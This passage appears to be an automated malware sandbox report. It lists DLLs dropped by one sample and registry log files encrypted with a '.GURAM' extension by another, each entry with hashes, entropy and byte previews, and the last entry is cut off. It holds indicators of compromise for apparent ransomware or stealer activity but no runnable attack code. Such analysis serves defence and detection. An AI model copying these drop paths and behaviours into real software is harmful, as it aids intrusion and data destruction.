                                                                                                                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):450024
                                                                                                                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2046288
                                                                                                                                                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):257872
                                                                                                                                                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):80880
                                                                                                                                                                                                                                                Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\Default\NTUSER.DAT.LOG1

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):66144
                                                                                                                                                                                                                                                Entropy (8bit):7.997111839089825
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:IGUca05EMa9nqSZa2MYQO4V7YBrGaRxvL/st60WFrwmn27XiszF:Ioa+r1OHe6Nhw427Xis5
                                                                                                                                                                                                                                                MD5:A5C5DE67F4FB4B92E6674633E425817A
                                                                                                                                                                                                                                                SHA1:77DBAABA359AC75AD774B8B6253ABBBA8541F5B9
                                                                                                                                                                                                                                                SHA-256:A5A43220707D03D41DEBE7491AB63416253E8EB67C1C9FA0D8715ABF6FA1F7C6
                                                                                                                                                                                                                                                SHA-512:9DF06A3D5376CFE796AC0B0300D0C54E91CCB99F417F59C90DE3146E2E4F73A26D2A632E2A0A5E2C4F5AE95DD493597799F8F627D0CAC4923C35439790F38365
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:4.l..?U&..v.U.....+usn=S%V>.......q.>F?..+.J.Z;G5.WZ....qn...A3Z.e....U.r...g..v.......b..+.....N...6..B...0.X.......a....7o.iw.".8.2..Z}>...\#E..n.7....7 L..&.......5x...E:..D........]d....Pb.].5.E....."M=..z..S.....O.. ........W.w..FY..{...W...m..z6.&.S..!E.O...g.he*.4..st..._.S.....d.;.&..(...,...O..A.-h.{...QXp....#...3......V[P$...`L~.2%j....g...w...\.M.fq.Q...._a..].......O.G.y.ns$....k......./..9X.....M....c.......H`g~@.4...Q.....m.}.3.....|:.&&t.~|.$.!.TV. .....\.Rz......a.b.*....h."I..M..4.C....z.8....b..Xw.yP.H.g....t?gM.#F..~^.......|.9..]..B`!.uM'A...........J. K.U...EG.Z.F..bBt./...2.V..\.......=^t.O;rf.......|...6m6Y..b.=6. ?.cu...ck.-k.9..r.:snBZ.k..... ...r...y....*gf.t...Q?x...........r....Q....3....<.th}......pu1.[...1..n1.....K.E.....f. =......@y.qo3T./....e..nv...d.....!.Lx.3.A."bJ........?.c..\b...?TG..(.>.......K...^....~....VAf.p.\7...;..pB#.....c...@.........#'.H.^...&<r..~.=..I.......Xl..E.....0..Q./.=......

                                                                                                                                                                                                                                                C:\Users\Default\NTUSER.DAT.LOG1.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):66144
                                                                                                                                                                                                                                                Entropy (8bit):7.997111839089825
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:IGUca05EMa9nqSZa2MYQO4V7YBrGaRxvL/st60WFrwmn27XiszF:Ioa+r1OHe6Nhw427Xis5
                                                                                                                                                                                                                                                MD5:A5C5DE67F4FB4B92E6674633E425817A
                                                                                                                                                                                                                                                SHA1:77DBAABA359AC75AD774B8B6253ABBBA8541F5B9
                                                                                                                                                                                                                                                SHA-256:A5A43220707D03D41DEBE7491AB63416253E8EB67C1C9FA0D8715ABF6FA1F7C6
                                                                                                                                                                                                                                                SHA-512:9DF06A3D5376CFE796AC0B0300D0C54E91CCB99F417F59C90DE3146E2E4F73A26D2A632E2A0A5E2C4F5AE95DD493597799F8F627D0CAC4923C35439790F38365
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:4.l..?U&..v.U.....+usn=S%V>.......q.>F?..+.J.Z;G5.WZ....qn...A3Z.e....U.r...g..v.......b..+.....N...6..B...0.X.......a....7o.iw.".8.2..Z}>...\#E..n.7....7 L..&.......5x...E:..D........]d....Pb.].5.E....."M=..z..S.....O.. ........W.w..FY..{...W...m..z6.&.S..!E.O...g.he*.4..st..._.S.....d.;.&..(...,...O..A.-h.{...QXp....#...3......V[P$...`L~.2%j....g...w...\.M.fq.Q...._a..].......O.G.y.ns$....k......./..9X.....M....c.......H`g~@.4...Q.....m.}.3.....|:.&&t.~|.$.!.TV. .....\.Rz......a.b.*....h."I..M..4.C....z.8....b..Xw.yP.H.g....t?gM.#F..~^.......|.9..]..B`!.uM'A...........J. K.U...EG.Z.F..bBt./...2.V..\.......=^t.O;rf.......|...6m6Y..b.=6. ?.cu...ck.-k.9..r.:snBZ.k..... ...r...y....*gf.t...Q?x...........r....Q....3....<.th}......pu1.[...1..n1.....K.E.....f. =......@y.qo3T./....e..nv...d.....!.Lx.3.A."bJ........?.c..\b...?TG..(.>.......K...^....~....VAf.p.\7...;..pB#.....c...@.........#'.H.^...&<r..~.=..I.......Xl..E.....0..Q./.=......

                                                                                                                                                                                                                                                C:\Users\Default\NTUSER.DAT.LOG2

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):21088
                                                                                                                                                                                                                                                Entropy (8bit):7.9913741216814635
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:neQld2/w4mtvFhxPM7stRTPgoMS3xj5F1RexbdqG7j6ax269XodYiQOExeVJ8SBN:ZZgstRLuSi97j6ddYcJ8SQM
                                                                                                                                                                                                                                                MD5:1B7D8DF8CB4D43A8D94C5CFC8721E9D8
                                                                                                                                                                                                                                                SHA1:72A66AF6ABC9CCC43CF2E58C421E91A47027FC0E
                                                                                                                                                                                                                                                SHA-256:49EBCA53F3890140D160D4F02BB16B8ABF408AA6C8AD5F8F8CE73BBF8357A993
                                                                                                                                                                                                                                                SHA-512:8A1E8469A2B87142453FA826691C58DCCE5EC009282EA2EBE6B2457647A2F1DCBEEAE2EE9B05EF755F937CF7E86DA8096E688053CDED1BE9CE0489AFE14A0D9E
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:'.I\l........V..~..u4...IF!~..X..v.J.&.Ww..cj.j.6..*..E.v....Q^....d.L......&......F9...Lv.m.^h.3.......:.C..i>...d'n~.u.T..K.Xe.x!x[0..H...!FJ.2......fQ.-.79J.....(g.l./......"......*...A.../.u.+A......9...zJ..7.].v......y..*...d.. ...R..wx......x(.x.CK......0=\........5.M.@D...(.39..<v:$.$.(.7....e..D.]M.b.....3....j.[>.6mp8.e|)Y..O.TZP.\.S...q..K.q...V..F.Hw..D_Jx....jJ..m(-....]=...o8...|.Q6...c....Y....[[.!..Tt.&|.3.H..g.[....><......z.*..V...A.#.....g....).S......,.u.$+#2....HY.C.U.Kw..""}.........c....XUClu,....By10 4..,...N..e.k+;.q....pw...R..U.26).p.Sxy+..N....,...E..h.......7....;....n~......q..l..S.F/a...R...v..,B'-..........P.Bq.bEF..b...B.C.Q......N.v[.uL...4].|..i..q,.....r..?....._..m.u.1.$8..:.}..@..I.C.4.....7..Q.O...X. ....../......z.@....q.x...W..CB.i..z.\6 ......./.p.^.-N..+}e../._|.7..2...n....or.r..C,w3...TN.E..P.iu e...=........:V].........(.slJ.2!..;.....l.`/...b.rc.,5...d..*yP.l.v|...@...e.=DX........bl...:P'..

                                                                                                                                                                                                                                                C:\Users\Default\NTUSER.DAT.LOG2.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):21088
                                                                                                                                                                                                                                                Entropy (8bit):7.9913741216814635
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:neQld2/w4mtvFhxPM7stRTPgoMS3xj5F1RexbdqG7j6ax269XodYiQOExeVJ8SBN:ZZgstRLuSi97j6ddYcJ8SQM
                                                                                                                                                                                                                                                MD5:1B7D8DF8CB4D43A8D94C5CFC8721E9D8
                                                                                                                                                                                                                                                SHA1:72A66AF6ABC9CCC43CF2E58C421E91A47027FC0E
                                                                                                                                                                                                                                                SHA-256:49EBCA53F3890140D160D4F02BB16B8ABF408AA6C8AD5F8F8CE73BBF8357A993
                                                                                                                                                                                                                                                SHA-512:8A1E8469A2B87142453FA826691C58DCCE5EC009282EA2EBE6B2457647A2F1DCBEEAE2EE9B05EF755F937CF7E86DA8096E688053CDED1BE9CE0489AFE14A0D9E
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:'.I\l........V..~..u4...IF!~..X..v.J.&.Ww..cj.j.6..*..E.v....Q^....d.L......&......F9...Lv.m.^h.3.......:.C..i>...d'n~.u.T..K.Xe.x!x[0..H...!FJ.2......fQ.-.79J.....(g.l./......"......*...A.../.u.+A......9...zJ..7.].v......y..*...d.. ...R..wx......x(.x.CK......0=\........5.M.@D...(.39..<v:$.$.(.7....e..D.]M.b.....3....j.[>.6mp8.e|)Y..O.TZP.\.S...q..K.q...V..F.Hw..D_Jx....jJ..m(-....]=...o8...|.Q6...c....Y....[[.!..Tt.&|.3.H..g.[....><......z.*..V...A.#.....g....).S......,.u.$+#2....HY.C.U.Kw..""}.........c....XUClu,....By10 4..,...N..e.k+;.q....pw...R..U.26).p.Sxy+..N....,...E..h.......7....;....n~......q..l..S.F/a...R...v..,B'-..........P.Bq.bEF..b...B.C.Q......N.v[.uL...4].|..i..q,.....r..?....._..m.u.1.$8..:.}..@..I.C.4.....7..Q.O...X. ....../......z.@....q.x...W..CB.i..z.\6 ......./.p.^.-N..+}e../._|.7..2...n....or.r..C,w3...TN.E..P.iu e...=........:V].........(.slJ.2!..;.....l.`/...b.rc.,5...d..*yP.l.v|...@...e.=DX........bl...:P'..

                                                                                                                                                                                                                                                C:\Users\Default\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):66144
                                                                                                                                                                                                                                                Entropy (8bit):7.997277022379524
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:tfCjQeGLuM6ZDggZiuy4SREMrMY4zQDsfbfRWOWY8ur7mU4rJpwI7mVuO:tfQQeGLufrgwSREqD2bf0NE7mJPwIxO
                                                                                                                                                                                                                                                MD5:5CCF3AB08A193ACABB1B6E9BB3E459EA
                                                                                                                                                                                                                                                SHA1:4851DB1F5177D4C280D0EC1EF7743BB5AE335FB9
                                                                                                                                                                                                                                                SHA-256:32CF53AC6FC4DA78C694BFCDEA61AD1618E5988219D35EE4B9B0CF0647B1DC9C
                                                                                                                                                                                                                                                SHA-512:DE172018AD508E7F16664CEE0FAE5A1182F2E5F9F7034176F33F25B3EBF57E0939C30FA808B298DF720C9319B89EC35F2F06B4A661DE3AB15AE7D29C7594D796
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:R.^...1..[.z.u.q[+. _...r_....z.......<..3.}p.C.z.q....Q..L.....b..gu..xc....Lg.c..a.7<...VQ.z.C..."..t.6|...q..9...........~.6V.l...w..|...2...1/...of........*M/.8R...^..m.@.R.."+..H..*..\..........<o.lb.u.?))m..FZ..Co.p8Cn3...S..Z..S.6...3d:.s...$..H.....FU.t..:yl......|..;.R.[.&.>..Pv4x.#8]Y.r...0x.6....qI.....p.{Y.:...#4.\..j....w.K...._......V.C.*!..6%.FB.?...!........(m....A...8......J.1>..f....QJ..|.W.?2..O.vc...*.GE.a=8..........S.36W|....Md#.>.ta'3.....4..H=?ck1..8.k..H....b^...K...86>..L^.>.UGhvNJ.....=....9.p...Y[8.D$.2......v....IK...g....77.s...\......0..N...X.%.....~...Aw.....B.,....S...&.;dQT.d....rF..;n8.b.{A.....R..a..<K.s..E~.F...^7...w.}R..Uwy=V...gx.o..7.|..a.zD......Z.0...L........!...._c......."..XnU^p=i....-.f..B.t.?.NI......VAN....j...i{.'..Nh^...^u..jp..8B.61.m.8.7...R..a.o.+....+......Q.:.^i..t.U...4.@.o........Q_h.h.....r.....y._[.$.G......#`m...4..4.#x..U.O*<.....[*D..!.>?...t..$(..d2...h...,.

                                                                                                                                                                                                                                                C:\Users\Default\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):66144
                                                                                                                                                                                                                                                Entropy (8bit):7.997277022379524
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:tfCjQeGLuM6ZDggZiuy4SREMrMY4zQDsfbfRWOWY8ur7mU4rJpwI7mVuO:tfQQeGLufrgwSREqD2bf0NE7mJPwIxO
                                                                                                                                                                                                                                                MD5:5CCF3AB08A193ACABB1B6E9BB3E459EA
                                                                                                                                                                                                                                                SHA1:4851DB1F5177D4C280D0EC1EF7743BB5AE335FB9
                                                                                                                                                                                                                                                SHA-256:32CF53AC6FC4DA78C694BFCDEA61AD1618E5988219D35EE4B9B0CF0647B1DC9C
                                                                                                                                                                                                                                                SHA-512:DE172018AD508E7F16664CEE0FAE5A1182F2E5F9F7034176F33F25B3EBF57E0939C30FA808B298DF720C9319B89EC35F2F06B4A661DE3AB15AE7D29C7594D796
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:R.^...1..[.z.u.q[+. _...r_....z.......<..3.}p.C.z.q....Q..L.....b..gu..xc....Lg.c..a.7<...VQ.z.C..."..t.6|...q..9...........~.6V.l...w..|...2...1/...of........*M/.8R...^..m.@.R.."+..H..*..\..........<o.lb.u.?))m..FZ..Co.p8Cn3...S..Z..S.6...3d:.s...$..H.....FU.t..:yl......|..;.R.[.&.>..Pv4x.#8]Y.r...0x.6....qI.....p.{Y.:...#4.\..j....w.K...._......V.C.*!..6%.FB.?...!........(m....A...8......J.1>..f....QJ..|.W.?2..O.vc...*.GE.a=8..........S.36W|....Md#.>.ta'3.....4..H=?ck1..8.k..H....b^...K...86>..L^.>.UGhvNJ.....=....9.p...Y[8.D$.2......v....IK...g....77.s...\......0..N...X.%.....~...Aw.....B.,....S...&.;dQT.d....rF..;n8.b.{A.....R..a..<K.s..E~.F...^7...w.}R..Uwy=V...gx.o..7.|..a.zD......Z.0...L........!...._c......."..XnU^p=i....-.f..B.t.?.NI......VAN....j...i{.'..Nh^...^u..jp..8B.61.m.8.7...R..a.o.+....+......Q.:.^i..t.U...4.@.o........Q_h.h.....r.....y._[.$.G......#`m...4..4.#x..U.O*<.....[*D..!.>?...t..$(..d2...h...,.

                                                                                                                                                                                                                                                C:\Users\Default\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):524896
                                                                                                                                                                                                                                                Entropy (8bit):4.984833632306723
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:GSRf678EH19vBhZP1GIIZCYvdBhc+9/DD:G8EV5B7tGII3n/DD
                                                                                                                                                                                                                                                MD5:F06760C1C00B140FF531059B996217F2
                                                                                                                                                                                                                                                SHA1:BE01B6077FA1A53A0E89B67636937504BD4AAA08
                                                                                                                                                                                                                                                SHA-256:42F4626D51DEAD8F859F90ECA84CA22E80541D76A9905927774DB212415DF0CA
                                                                                                                                                                                                                                                SHA-512:EFF6EF90FDDC7E33179649B787C8F8BE0D1CA252B7B09E20130D399D357DB42C2DEAF74999FC4080476C442C0C16D618D6F1985CFF221452B1EF85C381082B40
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:d..Y.._....k,k .....9.Q6_.hg..fZqP..15.....tB.!..0.W..Q.....*T-..?2..)..`gl..#E4.....F.'.....a.PC&...!.A*k$.......4].I......Z?qk[...>..j<^L...H....u.r.........J.\UI.".}..Gv.V5.IM.....+M..t]......J9....6{.\.{A(.,...a..+U..|U..EJ.5.u....J...;....2Z....]..q.1~!....=@....+._P).C..!.i_FV.f"...d.<&...n.-...q....u.].....EKGM..t..k........p.....h..gY.....mq...e..K...F.q.X.......T...wS.....!...L.....07_..g]F....lp..%...G.,.o-..dx*.b4OP......$...|.........f.....{"S....x6.H......~....VW........M...j.<{}......v..gX...1...bN{...@..~._.#?.l.zLz....8.k`...V........?....?..Y_]...q....4.w..7-t~..8..7z..Q..A..;....C.`..=..).pX.t.%x.....?.Q.u.[...T.O.,F\....C..A.....p.9.^r..+...)..g.Q......=~.v...].H...D.L.....)....N.5>.7.g...X"4.28N.h...).....,.....A.q.......n...[....-.o....*.d...<m./.SN<..L&.+hK...*....G.c.\......]....H...Tr_..<.....D.....S...>......).....I}^U".}..(@~....;.W...C.j%...7...~.bobR..r.ao...1...... 0.R....W..?.[......o.G......@.F

                                                                                                                                                                                                                                                C:\Users\Default\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):524896
                                                                                                                                                                                                                                                Entropy (8bit):4.984833632306723
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:GSRf678EH19vBhZP1GIIZCYvdBhc+9/DD:G8EV5B7tGII3n/DD
                                                                                                                                                                                                                                                MD5:F06760C1C00B140FF531059B996217F2
                                                                                                                                                                                                                                                SHA1:BE01B6077FA1A53A0E89B67636937504BD4AAA08
                                                                                                                                                                                                                                                SHA-256:42F4626D51DEAD8F859F90ECA84CA22E80541D76A9905927774DB212415DF0CA
                                                                                                                                                                                                                                                SHA-512:EFF6EF90FDDC7E33179649B787C8F8BE0D1CA252B7B09E20130D399D357DB42C2DEAF74999FC4080476C442C0C16D618D6F1985CFF221452B1EF85C381082B40
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:d..Y.._....k,k .....9.Q6_.hg..fZqP..15.....tB.!..0.W..Q.....*T-..?2..)..`gl..#E4.....F.'.....a.PC&...!.A*k$.......4].I......Z?qk[...>..j<^L...H....u.r.........J.\UI.".}..Gv.V5.IM.....+M..t]......J9....6{.\.{A(.,...a..+U..|U..EJ.5.u....J...;....2Z....]..q.1~!....=@....+._P).C..!.i_FV.f"...d.<&...n.-...q....u.].....EKGM..t..k........p.....h..gY.....mq...e..K...F.q.X.......T...wS.....!...L.....07_..g]F....lp..%...G.,.o-..dx*.b4OP......$...|.........f.....{"S....x6.H......~....VW........M...j.<{}......v..gX...1...bN{...@..~._.#?.l.zLz....8.k`...V........?....?..Y_]...q....4.w..7-t~..8..7z..Q..A..;....C.`..=..).pX.t.%x.....?.Q.u.[...T.O.,F\....C..A.....p.9.^r..+...)..g.Q......=~.v...].H...D.L.....)....N.5>.7.g...X"4.28N.h...).....,.....A.q.......n...[....-.o....*.d...<m./.SN<..L&.+hK...*....G.c.\......]....H...Tr_..<.....D.....S...>......).....I}^U".}..(@~....;.W...C.j%...7...~.bobR..r.ao...1...... 0.R....W..?.[......o.G......@.F

                                                                                                                                                                                                                                                C:\Users\Default\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):524896
